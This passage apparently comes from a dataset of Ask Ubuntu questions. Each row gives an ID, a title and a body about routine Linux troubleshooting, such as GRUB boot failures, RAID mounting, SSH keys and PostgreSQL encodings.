intrepid-security universe deb-src http : //us.archive.ubuntu.com/ubuntu/ intrepid-security universe deb http : //us.archive.ubuntu.com/ubuntu/ intrepid-security multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ intrepid-security multiverse
20799	how do you create indicators ?	where could i find some documentation ?
20804	locate excludes hidden files ?	how to configure locate so that it indexes all files including hidden ones ? or what does locate exclude in its search ?
20805	grub does n't load after update	after i updated ubuntu ( i believe it was most likely a kernel update ) and restarted i selected ubuntu from the windows boot loader ( i am using wubi ) . at this point i would usually land on the grub loader ; however , i see something about ntfs file not found and a couple other screens flash then the computer restarts . i have tried pressing esc right after to try and get some options , but i think grub is just not found or something ... not sure what is going on.. any help would be much appreciated : ) . thanks !
20806	why does printf report an error on all but three ( ascii-range ) unicode codepoints , yet is fine with all others ?	the 'printf ' i refer to is the standard-issue `` program '' ( not the built-in ) : /usr/bin/printf i was testing printf out as a viable method of convert a unicode codepoint hex-literal into its unicoder character representation , i was looking good , and seemed flawless.. ( btw . the built-in printf ca n't do this at all ( i think ) ... i then thought to test it at the lower extreme end of the code-spectrum , and it failed with an avalanche of errors.. all in the ascii range ( = 7 bits ) the strangest thing was that 3 value printed normally ; they are : $ \u0024 @ \u0040 ` \u0060 i 'd like to know what is going on here . the ascii character-set is most definitely part of the unicode code-point sequence ... . i am puzzled , and still without a good way to bash script this particular converion.. suggestions are welcome . to be entertained by that same avalanche of errors , paste the following code into a terminal ... # here is one of the error messages # /usr/bin/printf : invalid universal character name \u0041 # ... for them all , run the following script ( for nib1 in { 0..9 } { a..f } ; do for nib0 in { 0..9 } { a..f } ; do [ [ $ nib1 < a ] ] & & nl= '' \n '' || nl= '' `` $ ( type -p printf ) `` \u00 $ nib1 $ nib0 $ nl '' done done echo )
20808	is it possible to give sftp access to a user without giving him ssh access ?	is it possible to give sftp access to a user without giving him ssh access ?
20809	how do i connect to the ubuntu one server-side couchdb ?	how do i connect to the ubuntuone couch on the ubuntu server side ( the one my local desktopcouch replicates with )
20814	what software that can convert all the video formats to ipod nano mp4 format ?	what software that can convert all the video formats to ipod nano mp4 format ?
20821	using locate on an encrypted partition	i selected /home/ to be encrypted when i was installing ubuntu . now , is it possible to make locate work with an encrypted partition like this ?
20822	wireless does n't connect in ubuntu 10.04 lxde	problem i have a dell mini 9 , and the wireless has worked without trouble in ubuntu and xubuntu versions 8.04 and 10.04 . however , after installing lxde , the wireless doesnt connect . network manager recognizes the local networks , and will say that it is connected , but ifconfig does not confirm the connection or the existance of a wlan0 . i have another ubuntu 10.04 notebook that works fine . my wireless device is broadcom bcm4312 802.11b/g what i have tried i have tried to remove and install network-mananager and inxi but neither work , and sudo modprobe wl returns warning : all config files need .conf : /etc/modprobe.d/blacklist , it will be ignored in a future release .
20824	error while removing the new kernel 2.6.37	i tried to install the new kernel but something went wrong and i 'm trying to remove it now . the error massege is : mhd @ tarek-laptop : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : linux-image-2.6.37-020637-generic 0 upgraded , 0 newly installed , 1 to remove and 9 not upgraded . 1 not fully installed or removed . after this operation , 111mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 188780 files and directories currently installed . ) removing linux-image-2.6.37-020637-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 2.6.37-020637-generic /boot/vmlinuz-2.6.37-020637-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 2.6.37-020637-generic /boot/vmlinuz-2.6.37-020637-generic /etc/default/grub : 33 : syntax error : eof in backquote substitution run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-2.6.37-020637-generic.postrm line 328. dpkg : error processing linux-image-2.6.37-020637-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : linux-image-2.6.37-020637-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the previous unsloved error is on this bug . this is my grub configuration file : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` rub_cmdline_linux_default= '' quiet splash nomodeset video=uvesafb : mode_option=1024x768-24 , mtrr=3 , scroll=ywrap '' video=uvesafb : mode_option= > > 1024x768-24 < < , mtrr=3 , scroll=ywrap '' grub_cmdline_linux= '' vga=792 splash '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' grub_gfxmode=1024x768-24 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_linux_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' thank you for answering .
20829	how can i change the purple background color of ubuntu plymouth boot screen ?	i 'd like to change the background color of the purple plymouth bootsplash to another color , how can i do this ?
20830	why does n't ubuntu ship an application , or the latest versions of some applications ?	what reasons are there for applications in ubuntu not being the most up-to-date , and why are some applications not available , in its repositories ?
20835	how do i copy packages within a ppa from one release to another ? ( nonsensical `` same version already has published binaries '' error )	i keep getting weird errors from launchpad when i try and copy the maverick packages to natty for the ppa . i select the wine1.3 package ( not in ubuntu ) , select `` copy to this ppa '' , and then select `` rebuild the resulting binaries '' . this error emerges : the following source can not be copied : wine1.3 1.3.11-0ubuntu1 in maverick ( same version already has published binaries in the destination archive ) i have no idea what this error means but apparently it does n't mean there are binaries in the destination archive .
20838	how can i connect to my ti-89 calculator ?	i 'd like to transfer data to and from my ti-89 titanium that connects via a usb cable . how can i do this in ubuntu ?
20840	i ca n't download the song i just purchased	i tried to download the song that i purchased , but rhythmbox was reporting that i was n't connected to the internet . i was n't experiencing connectivity issues with any other package including the web browser , irc client , im client ... you get the point . everything but rhythmbox 's download or u1 's sync works . this could be related to bug # 596394 . i 'm working with maverick amd64 .
20844	how can i make the date/time applet display on a single line ?	i just updated from lucid to natty ( thought it was going to be maverick , but my about ubuntu menu shows that it is natty , which `` was released in april 2011 '' - who knew the developers had mastered time travel ? ! ) in any case , the default date/time applet in my gnome panel is now displaying on two lines ( date on top of time ) instead of one line like it used to . any way to get it back on one line ? i 've tried the instructions shown here , but it does n't seem to make a difference .
20849	failed to start up after upgrading software	i asked this question in superuser one hour ago , then i know this community so i moved the question here ... i 've been running ubuntu 10.10 in a physical x86-64 machine . today update manager reminded me that there are some updates to install and i confirmed the action . i should had read the update list but i did n't . i can only remember there is an update about cups . after the upgrading , update manager requires a restart and i confirmed too . but after the restart , the computer ca n't start up . there are errors in the console . begin : running /scripts/init-premount ... done . begin : mounting root file system ... begin : running /scripts/local-top ... done . [ xxx ] usb 1-8 : new high speed usb device using ehci_hcd and address 3 [ xxx ] usb 2-1 : new full speed usb device using ohci_hcd and address 2 [ xxx ] hub 2-1:1.0 : usb hub found [ xxx ] hub 2-1:1.0 : 4 ports detected [ xxx ] usb 2-1.1 : new low speed usb device using ohci_hcd and address 3 gave up waiting for root device . common probles : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) fatal : could not load /lib/modules/2.6.35-22-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/2.6.35-22-generic/modules.dep : no such file or directory alert ! /dev/sda1 does not exist . dropping to a shell ! busybox v1.15.3 ( ubuntu 1:1.15.3-1ubuntu5 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) at the moment , i ca n't input anything in the console . the keyboard does n't work at all . what 's wrong ? how can i check boot args or `` root= '' as suggested ? how can i fix this issue ? thanks . =============== ps1 : the /dev/sda1 is type ext4 ( rw , nosuid , nodev ) ps2 : the /dev/sda1 can be mounted and accessed successfully under suse 11 sp1 x64 . ps3 : from this link , i think the keyboard does n't work because the usb driver is not loaded at that time .
20852	making stripe_cache_size permanent	i did echo 8192 > /sys/block/md0/md/stripe_cache_size to improve my raid performance , and it did helped alot . but i still ca n't figure out how to make it permanent . i was trying to set it in /etc/rc.local - other commands are executed , but it was overwritten to 256 elsewhere ... any hints ?
20853	mount ubuntu 's partition on windows 7	is it possible to mount ubuntu 10.10 's partition on windows 7 ?
20854	how to enable user sharing per instructions ?	i have this entry in .xsession-errors log '' nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . this is in relation to my applets having to be reloaded after every boot . just wondering how i would enable user sharing , and how it affects my applets ? ?
20856	virtual desktop icon missing	for some mysterious reason the virtual desktop icon from the kubuntu 10.10 panel has disappeared . how could i added it back to the panel ?
20857	mdadm : breaks boot due to `` is not ready yet or not present '' error	this is so damn frustrating : -| i 've spent like 20 hours on this nice error , and seems like dozens of people over internet too , and no clear solution yet . i have non-system raid-5 of 5 disks , and it 's fine . but during boot up it says that '' /dev/md0 is not ready yet or not present '' and asks to press 's ' . very nice for ubuntu server - i have to bring monitor and keyboard to go next . after this system boots and it 's all fine . md0 device works , /proc/mdstat is fine . when i do mount -a - it mounts this array without errors and works fine . as a dumb and shameful workaround i added noauto in /etc/fstab , and did mounting in /etc/rc.local - it works fine then . any hints how to make it work properly ? fstab : uuid=3588dfed-47ae-4c32-9855-2d69df713b86 /var/bigfatdisk ext4 noauto , noatime , data=writeback , barrier=0 , nobh , commit=5 0 0 mdadm config : it is autogenerated : # mdadm.conf # # please refer to mdadm.conf ( 5 ) for information about this file . # # by default , scan all partitions ( /proc/partitions ) for md superblocks . # alternatively , specify devices to scan , using wildcards if desired . device partitions # auto-create devices with debian standard permissions create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost < system > # instruct the monitoring daemon where to send mail alerts mailaddr censored # definitions of existing md arrays array /dev/md/0 metadata=1.2 bitmap=/var/md0_intent uuid=efccbeb6 : a0a65cd6:470dcdf3:62781188 name=lbox2:0 # this file was auto-generated on mon , 10 jan 2011 04:06:55 +0200 # by mkconf 3.1.2-2 partitions : root @ lbox2 : /home/px # cat /proc/partitions major minor # blocks name 8 0 976762584 sda 8 1 976562483 sda1 8 2 131072 sda2 8 16 976762584 sdb 8 17 976562483 sdb1 8 18 131072 sdb2 8 32 78150744 sdc 8 33 74919096 sdc1 8 34 1 sdc2 8 37 3229033 sdc5 8 48 976762584 sdd 8 49 976562483 sdd1 8 50 131072 sdd2 8 64 976762584 sde 8 65 976655593 sde1 8 80 976762584 sdf 8 81 976655593 sdf1 9 0 2929683456 md0 mdstat : root @ lbox2 : /home/px # cat /proc/mdstat personalities : [ raid6 ] [ raid5 ] [ raid4 ] md0 : active raid6 sda1 [ 0 ] sdd1 [ 4 ] sde1 [ 5 ] sdf1 [ 2 ] sdb1 [ 1 ] 2929683456 blocks super 1.2 level 6 , 1024k chunk , algorithm 2 [ 5/5 ] [ uuuuu ] bitmap : 0/8 pages [ 0kb ] , 65536kb chunk , file : /var/md0_intent unused devices : < none >
20859	how do delete songs from sony walkman mp3 player ?	i can delete , rename and reorganize songs by clicking on the ubuntu desktop icon for my walkman . however , the changes are not evident on the player itself . help ?
20863	how do i permanently add an identity for ssh ?	i need to run ssh-add < key > everytime i need to ssh into a webserver . is there a way to add the id permanently , so i dont have to keep adding the identities on each login ? edit : the key is a pem file , that i have downloaded from a cloud service .
20864	gnome shell overview animation is slow on my nvidia 320m	i 'm running ubuntu 10.10 on my macbook air 11 '' ( late 2010 model 3,1 ) . compiz runs fine , as well as most of gnome shell 's animations . the animation for switching to and from gnome shell overview is just very slow . unfortunately , it 's the most common animation on shell . i already applied cd ~/gnome-shell/source/gnome-shell curl http : //bugzilla-attachments.gnome.org/attachment.cgi ? id=157326 > shell-animations-nvidia.patch git am shell-animations-nvidia.pat that i found from http : //live.gnome.org/gnomeshell/swatlist , but the issue 's still here . how do i fix this ? edit : apparently , it 's an nvidia driver bug , which has something to do with the message tray . is this correct ? how do i go around this issue ?
20865	is it possible to remove a particular host key from ssh 's known_hosts file ?	is it possible to remove a particular host key from ssh 's known_hosts file ? i usually end up deleting the entire known_hosts file , which i have no problems with doing , but just out of curiosity , is it possible to remove just a single entry ? i opened the known_hosts file , but i am struggling to understand its contents . below is the message i faced , which led me to ask this question : add correct host key in /home/wissen16/.ssh/known_hosts to get rid of this message . offending key in /home/wissen16/.ssh/known_hosts:1 rsa host key for foo.com has changed and you have requested strict checking . host key verification failed .
20871	how do the environments of a standard terminal command-line and a bash script differ ?	i know there is something different about the environment of the terminal command-line and the environment in a bash script , but i do n't know what that difference is ... here is the example which finally led me to ask this quesiton ; it may flush out some of the differences . i am trying to strip leading '0 's from a number , with this command . var= '' 000123 '' ; var= '' $ { var # # + ( 0 ) } '' ; echo $ var when i run this command from the terminal 's command-line , i get : 123 however , when i run it from within a script , it does n't work ; i get : 000123 i 'm using ubuntu 10.04 , and tried all the following with the sam results : gnome terminal 2.30.2 konsole 2.4.5 # ! /bin/bash # ! /bin/sh my bash version 4 1 5 1 release i486-pc-linux-gnu ( in terminals and scripts ) 'shopt ' differences between cli and script : cli script on off checkwinsize on off expand_aliases on off extglob on off histappend off on hostcomplete what is causing this difference ? even if some upgrade will make it work in scripts ... i am trying to find out the what and why , so in future , i 'll know what to look out for . here are 3 bash ways to strip leading '0 's . ( i knew only one when i first asked this queston ) var=0001230 ; var= '' $ [ 10 # $ var ] '' ; echo $ var # fastest= 1.00 integers only var=0001230 ; var= '' $ { var # # + ( 0 ) } '' ; echo $ var # slower x 1.25 works with strings , but requires shopt -s extglob var=0001230 ; var= '' $ { var # $ { var % % [ ! 0 ] * } } '' ; echo $ var # slower x 1.61 works with strings
20872	how do i limit internet bandwidth ?	i am getting complaints that i consume lots of internet bandwidth so is there any software that can limit internet bandwidth on my computer from my own computer . i use firefox as browser and use bittorrent and download software from software center . ( is there a way to monitor it ? )
20879	gedit plugin for html tag match	is there a gedit plugin for highlighting html matching tag ? if so then please suggest me . updates : : < div > //div 1 < div > //div 2 < /div > //end of div 2 < /div > //end of div 1 now if my cursor is at end of div 1 then i want div 1 to be hilighted so that i know if i have closed my tags correctly or not
20880	how do i create a unicode databases in postgresql 8.4 ?	i installed the postgresql-8.4 package with default options . everything worked fine , however i ca n't seem to manage to create unicode databases : -- this does n't work createdb test1 -- encoding unicode -- this works createdb test2 the error message , createdb : database creation failed : error : new encoding ( utf8 ) is incompatible with the encoding of the template database ( sql_ascii ) is a bit puzzling because ( afaik ) i do n't use a template for creating the new db , or is it implicitely referring to the default `` postgres '' database for some reason ? or maybe i 'm missing a setting in a .conf file ?
20887	will natty run without a pc bios ( i.e . with uefi )	there are plans to remove bios from new computers . is natty prepared for this ? will it work when i buy a newer hardware or should i buy older pc ?
20889	is there a app / command that will hunt for files	is there a app / command that will hunt for specified files ( thumbs.db , .m3u and similar ) files across my home dir and delete them ?
20896	lenovo ideapad s10-3 wireless disabled problem	i installed ubuntu 10.10 to my lenovo s10-3 a couple of weeks ago . at first there was no problem but yesterday when i tried to connect to internet , i realized that my `` wireless '' seemed as disabled . i googled about this issue and tried some codes however nothing changed . i need some help . by the way , i have no wired connection .
20897	x crashes and gnome loses all its configuration	about every 3 days on my desktop ( always on ) , x crashes , gdm restarts and it dumps me at a login screen . when i log in gnome appears to have lost a lot of its settings : it plays sounds in weird places , ui elements look like they 're from the 90s ( gtk+ defaults ) and it 's generally pretty hideous . note everything works fine . it 's not like my profile does n't exist because i can browse the internet fine ( firefox knows my bookmarks , history , passwords , etc ) and my desktop is unscathed ( apart from the icon theme ) . manually restarting gdm does n't fix this . i have to do a full reboot . now i 'm almost certain that this is a nvidia issue causing x to baulk ( i 've seen similarish threads on nvnews ) and i 'm happy with that ( my fault for running their latest drivers all the time ) . what i 'm concerned about is why gnome looks so fugly . is there anything i can do to force it to reload its settings without restarting the whole computer . restarting is an issue for me as i run several daemons that other computers on the network depend upon . this is what i mean by ugly/fugly ... look at that scroll bar !
20903	override built-in maverick keyboard shortcuts	having used the command+m keyboard shortcut to minimize windows in os x , i 'd like to use the same functionality in ubuntu 10.10 . when i try , though , it only brings up the `` communications '' section of the indicator applet ; like so : in the keyboard shortcuts preferences , i have set as the minimize shortcut mod4+m , which i got by capturing the apple command key and the m key . i find no other shortcut using this key combination in keyboard shortcuts , and yet i can not get the window to minimize when using it . does anyone know how to override ubuntu 's default usage of this key combination ? thanks !
20909	where do i find the icons folder ( file ? ) ?	where do i find the icons folder ( file ? ) ? then how do i change an apps icon to one of my choosing ?
20910	why is evolution the default mail/calendar package ?	why is evolution the default mail/calendar package that comes with ubuntu ? why not thunderbird + lightning ? are there any features in evolution that are not available in thunderbird + lightning ? can i use the evolution database via a samba network share , on a windows xp or 7 client , just like i can do with thunderbird ? what happens if i uninstall evolution from my 10.04 system ? will i lose any integrated functionality built into the system ?
20913	is there alternative to ietester ?	i used to use ietester in windows for testing site . but i found that it has no downloads for linux . is there any alternative for ietester in ubuntu .
20916	syncing apt-get installations between multiple computers	is there a way to synchronize my installations ( and removals ) between multiple pcs ? preferably with dropbox - since i 'm already using that to keep my files in sync . i thought of an alias for the apt-get install and apt-get remove commands that stores the parameters to a file ( one for install , one for remove ) and another command that reads all the entries in the file and executes the respective command . is this a realistic approach ?
20919	is there a way to suspend/sleep via bash ?	i have to get nine 46 '' lcd monitors ( running windows ) to suspend/sleep at 8pm and wake at 8am every morning . it 's been a bit of a mess trying to get the commands working , including the privileges . since i 'm an ubuntu user first and foremost , i 'm wondering how easy this would be in ubuntu/linux . i know cron would be able to run my suspend/sleep command at 8pm ( what is the suspend/sleep command anyway ? ) , but what about waking the machine up at 8am without using wake-on-lan or manual intervention ?
20925	can i expand my /boot without upsetting the system ?	this is the current state of my partition table . as can be seen , the boot is very small , and i ca n't upgrade the kernel , because the update-manager tells me there isnt enough space on /boot : ( which effectively means that i ca n't update my kernel . can i change the size of my boot , without necessitating a reinstall of either of the installed system ? filesystem size used avail use % mounted on /dev/sda5 12g 4.9g 6.2g 45 % / none 2.0g 284k 2.0g 1 % /dev none 2.0g 8.5m 2.0g 1 % /dev/shm none 2.0g 92k 2.0g 1 % /var/run none 2.0g 0 2.0g 0 % /var/lock /dev/sda3 42g 21g 22g 49 % /media/erste /dev/sda2 5.1g 2.5g 2.7g 48 % /media/swap /dev/sda1 30g 25g 4.9g 84 % /media/windows7 /dev/sda9 47g 28g 20g 60 % /media/zweite /dev/sda6 11g 7.6g 2.0g 80 % /home /dev/sda8 49m 31m 16m 66 % /boot this is the output of sudo fdisk -lu
20929	gnome/x logs off immediately after login -- which logfiles are relevant ?	i 've been tinkering with fingerprint-gui as well as x/xrandr resolution settings . when i start my machine , it boots up normally . as soon as x and gnome have finished starting , it logs me off automatically and brings me back to the gdm login prompt with the user list . then i am , however , able to log in using `` ubuntu desktop fail-safe '' . i 've checked the list of start-up applications , but everything seems fine there . i ca n't yet put my finger on what exactly might be responsible for this : x , gnome or some messed up pam.d settings . so far i 've checked /var/logs/x11/xorg.0.log , /var/logs/auth.log and ~/.xsession-errors . in addition , i do n't quite seem to understand the `` interplay '' between x , gdm , gnome , gnome-policykit , pam.d and all that . are there any other relevant log files that could point me to what 's broken ? specs : ubuntu 10.10 maverick meerkat ibm/lenovo thinkpad r60 , ati radeon x1400 mobility all updates installed linux user 1 year+ ,
20931	will deleting files on my computer delete them them in ubuntu one ?	ok . so i usually save my files online and not on my computer . i am hoping to be able to set up my ubuntu one cloud to recognize changes made to documents and add new documents when synchronizing . but not delete from the cloud , files i have deleted from my computer . does anyone know if this is possible ? i have searched around and ca n't figure out the answer to my question . i would appreciate any direction . thank you so much !
20937	how can i easily retab html files according to some sane default ?	i have some html files that i 'd like to retab that look like this : < header > < div class= '' wrapper '' > < img src= '' images/logo.png '' > < div class= '' userbox '' > < div class= '' welcome '' > welcome andy ! < /div > < div class= '' blackbox '' > < ul > < li > < a href= '' # '' > invite friends < /a > < /li > < li > < a href= '' # '' > my account < /a > < /li > < li > < a href= '' # '' > cart < /a > < /li > < li > < a href= '' # '' > sign out < /a > < /li > < /ul > < /div > < /div > < /div > < /header > and i want them to look something like this : < header > < div class= '' wrapper '' > < img src= '' images/logo.png '' > < div class= '' userbox '' > < div class= '' welcome '' > welcome andy ! < /div > < div class= '' blackbox '' > < ul > < li > < a href= '' # '' > invite friends < /a > < /li > < li > < a href= '' # '' > my account < /a > < /li > < li > < a href= '' # '' > cart < /a > < /li > < li > < a href= '' # '' > sign out < /a > < /li > < /ul > < /div > < /div > < /div > < /header > or some sane default . what 's the easiest way to go about doing this from the terminal in ubuntu for all of the html files in the current directory ?
20951	how to make a link to a .desktop [ desktop entry ] file	i made a link on my desktop to the launcher file `` compiz '' in /usr/share/applications/ . when i try to execute it i get : '' the application launcher `` link to compiz.desktop '' has not been marked as trusted . if you do not know the source of this file , launching it may be unsafe . '' so my question is how to make such a launcher on my desktop ? otherwise , what kind of file are these [ desktop entry ] files and how can they be executed ( by double clicking on them ) if they have permissions such as : -rw-r -- r -- 1 root root 396 2010-12-17 15:23 compiz.desktop
20953	sudo : source : command not found	i 've been updating some of the default profile for bash , and saw from the tutorials i was following that i could reload the new profile with the new environment settings by using : source /etc/bash.bashrc the only thing is - the new environment variables were only available to my current user - and were ignored when i used sudo . they only became available to sudo when i closed my terminal session and rejoined . when i try to use : sudo source /etc/bash.bashrc i get the error : sudo : source : command not found is there a simple way to load in the new bash profile settings for sudo without having to close the terminal and restart ? -- initially , i was using some installer scripts which referenced the variables . i found that while they could access the variables when i called the scripts directly ( although , this would cause a later problem with creating directories as i needed to be root ) , calling the install scripts using sudo would n't . i proved this by testing with these simple commands : echo $ env_variable sudo echo $ env_variable the first would output the variable 's value , but the second would n't output anything .
20959	random touchpad and keyboard freezes on new installation	my touchpad and keyboard freeze up on my newly installed ubuntu 10.10 . they remain frozen until you shut down manually . no keys work , cursor does n't move - it 's like a screenshot . i was using ubuntu 10.4 via wubi before on this laptop where this problem never occurred . ( i did not migrate wubi or upgrade to 10.10 , it 's a fresh start . 64-bit on dell studio , plenty of ram , plenty of free space on partition etc. , dual boot windows 7 and ubuntu 10.10 ) i ca n't say there is a pattern yet , once it happened during the download of packages with the update manager , once it was just using firefox , no other program running . in between these crashes the laptop was booted once , updates were installed etc. , firefox was used and there were n't any problems . both crashes should be in the attached kern.log and i noticed there were some error problems before the last crash ( at the end , obviously ) . it seems the wireless was experiencing problems . this was n't noticed on the user end , since the touchpad + keyboard were already frozen . kern.log : http : //paste.ubuntu.com/552617/ something that seems to reoccur before the crash ( in the kern.log ) : jan 13 09:18:29 buntekuh kernel : [ 14.151640 ] ppdev : user-space parallel port driver jan 13 09:18:30 buntekuh kernel : [ 14.834419 ] ext4-fs ( sda7 ) : re-mounted . opts : errors=remount-ro , commit=600 jan 13 09:18:31 buntekuh kernel : [ 15.830695 ] hda-intel : irq timing workaround is activated for card # 1 . suggest a bigger bdl_pos_adj . jan 13 09:18:31 buntekuh kernel : [ 16.366754 ] ext4-fs ( sda7 ) : re-mounted . opts : errors=remount-ro , commit=600 jan 13 09:18:40 buntekuh kernel : [ 24.536401 ] eth1 : no ipv6 routers present it seems there is a problem with one of the logical partitions , /dev/sda7 - this is the partition ubuntu is installed on . how can the freezes be fixed ? edit : i have tried ctrl+alt+f1 and then ctrl+alt+f7 during the last freeze to switch away and back to the desktop , as suggested here . but there was no reaction , so i 'm guessing the keyboard is pretty stiff , too . again , i had firefox opened , this time evolution was also in the mix .
20961	virtualbox seamless mode -- no window borders ?	( before anyone asks -- i 've installed the guest additions correctly . : ] ) when i turn on on seamless mode for virtualbox , it seems to work , but my windows no longer have any borders , and so i ca n't move them , maximize them , etc . why is this ? is there a fix ?
20971	change login window appearance	is there any way to change the appearance of the login window ( specifically including the font hinting settings ) ? it would be nice if i could somehow `` sudo '' as the login window 's account , then change the settings like that .
20975	eclipse wo n't let me select a windows share as workspace	environment : ubuntu 10.04 ( 64-bit ) , eclipse helios 3.6 ( 64-bit ) , android 2.3 sdk + adt . all works great , but i can only select a workspace that 's on the local system . eclipse wo n't let me select shared folder on a samba server . ubuntu 's uri for this share is of the form : smb : //userid @ 192.168.0.2/sandbox/workspace but even if i typed this manually into the edit box , eclipse wo n't accept it . i do n't have this problem with eclipse 3.6 on windows . is there a workaround to solve this ?
20978	theme changes after resuming from suspend	i 'm using a dell inspiron 1520 and ubuntu 10.10 . i 've read a lot of questions about graphics problems after resuming from suspend , but most of them are much more serious than mine . i can boot , login and use ubuntu fine . the problem is that my theme for my top bar and bottom bar changes to gray and blocky ( not rounded ) . oddly enough , the theme for the title bars of my windows stay the same dark theme . any ideas how i can fix this ? it works fine if i logout and log back in .
20979	difference in ubuntu one sync-speed between natty and other versions ?	i was wondering if anyone had had the chance to compare performance between ubuntu one upload speeds on natty narwhal and any other version of ubuntu ? also , any difference on how well it connects ? [ do n't shoot me for asking ; ) ] i am hesitant about upgrading on my regular workstation , but if it improves my user-experience with u1 , i might be willing to risk it ... thanks for all informed opinions : ) bisi
20982	what do the 4 keyboard input method systems mean ?	i am trying to install another language support ( in addition to the default us ) . checking that language checkbox in `` install / remove languages ... '' was n't too difficult . : ) but now i want to add keyboard support , too , for that language . again , i am prompted with a nice listbox with the following 4 options : none ibus lo-gtk th-gtk but i have no idea what these mean . i googled `` ubuntu 10.04 keyboard input method system none ibus lo-gtk th-gtk '' but all i could find was descriptions of problems , not an actual definition . could you please point me to a webpage where i can learn about the meanings of these 4 different methods and + 's and - 's of each ?
20983	where can i find a tool to create a gif/jpg/other index of icons available in a visio stencil ( .vss )	i have a collection of visio stencils , and i need a tool that can create a gif/jpeg , etc index of the stencils within it . if not available , is there a tool that can create a thumbnail of each object within a given stencil ?
20984	always sudo privileges	i 've searched for this , and the answer is probably in a million places on the 'net , but i ca n't find it ... how do you give your account root privileges in linux so that you do n't need to sudo every single command that requires privileges ? it 's even more annoying than windows 's user accounts control . ( please ... i do n't need a lecture on how i would be living a dangerous life . thank you . )
20985	what other bash variables are available during execution such as $ user that can assist on my script ?	this is related to question 19245 , in that one of the responders answered the question in an awesome way , and very very clear to any newbie . now here is a question that i ca n't seem to figure . i wrote a script for starting the vmware firefox plugin ( do n't worry . i gave that up and now run vbox very happily . i left vmware for my servers : ) ) i needed to start the plugin as sudo , but i also needed to pass an argument ( password ) to it , that happen to be the same . so , if my password was hello123 , the command would be : sudo ./myscript.sh hi other hello123 running from command line , the script would ask for my sudo password and then run . i wanted to capture that password and pass it as well . i also wanted to run graphically , so i tried gksudo , and there is an option -p that returns the password for variable assignment . well , that was a nightmare , because i would still get prompted for the original sudo : see below find username vuser= $ user find password ( and hopefully enable sudo ) vp=gksudo -p -d somedescriptiontext echo execute command gksudo ./myscript.sh hi $ vuser $ vp and i still get prompted twice . so my question is tri-fold : is there a variable i can use for the password , just like there is one for user , $ user ? is there a different way i should be assigning the value resulting of the command i have in $ vp ? i am wondering if executing the way i have it , does it in an uninitiated session and not the current one , since i am getting some addtl warning type errors on some variables blah blah i tried using zenity to just capture the text , but then of course , i could n't pass that value to sudo , so i could only use as a parameter , which puts me back in 2 prompts . thanks !
20987	dual sound from headphones and speakers	i have tried everything from this question and this question and i have nothing . i have an asus k50ij and i just can not seem to get head phones working solo . according to lspci i have 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) i am running ubuntu 10.10 .
20988	how to run firefox inside wine with windows compatible plugins ?	how to run firefox inside wine with windows compatible plugins..i am a newbie..i have to complete a online training program and need adobe flashplayer plugin . it seems it is not available for linux..so what should i do here ? how can wine help ? please tell me in baby steps..thanks amith
20989	how do i tell a start up program to start minimized ?	here is a quesion that has been bugging me . you know how you can set up a program to run on start up right ? well , how can i tell it to start minimized , like you would do in windows ? teamviewer starts open , but i need it minimized , and tray-it just does n't seem as elegant of a way to do it .
20992	update gets stuck unpacking bad package , wo n't continue without it	removing the package from cache , and disabling recommended updates in software sources gives me an error saying i need to install this package . i 've tried to update several times , but it keeps hanging on unpacking the ubuntu-sso-client package . which forces me to hard-reset to unlock the package manager . i 've tried : sudo dpkg -- configure -a no errors sudo apt-get upgrade -- fix-broken wants me to reinstall said package , resulting in it hanging removing the package : sudo rm -f /var/cache/apt/archives/ubuntu-sso-client_1.0.8-0ubuntu1_all.deb results in the same effect , it re-downloads then hangs i can de-select recommended updates but i get error messages when i try to update again : e : the package ubuntu-sso-client needs to be reinstalled , but i ca n't find an archive for it . which wo n't let me continue finally re-enabling the source , i try to remove ubuntu-sso sudo apt-get remove ubuntu-sso-client it removes a bunch of other packages but complains about the package : dpkg : error processing ubuntu-sso-client ( -- remove ) : package is in a very bad inconsistent state - you should reinstall it before attempting a removal . reinstalling ubuntu-sso-client hangs : ( i 'm at my wits end , any ideas ? i would be nice to install all the other updates but this one is preventing it .
21002	how to fix phpmyadmin login ?	i 've isnstalled phpmyadmin with apt-get install phpmyadmin . when i open `` http : //localhost/phpmyadmin/ '' , enter `` root '' as the user name and my mysql root password and press go , then if i use firefox , i get offered to download index.php file ( and if i agree to download , the file is empty ) , if i use opera 11 , it says `` connection closed by remote server '' . what may the reason be and how to fix it ? i use up-to-date xubuntu 11.04 . reinstalling phpmyadmin did not help , neither did removing apparmor . i 've tried to use sqlbuddy instead , but there 's exactly the same problem . so , i think , the problem is not in phpmyadmin but in apache or something .
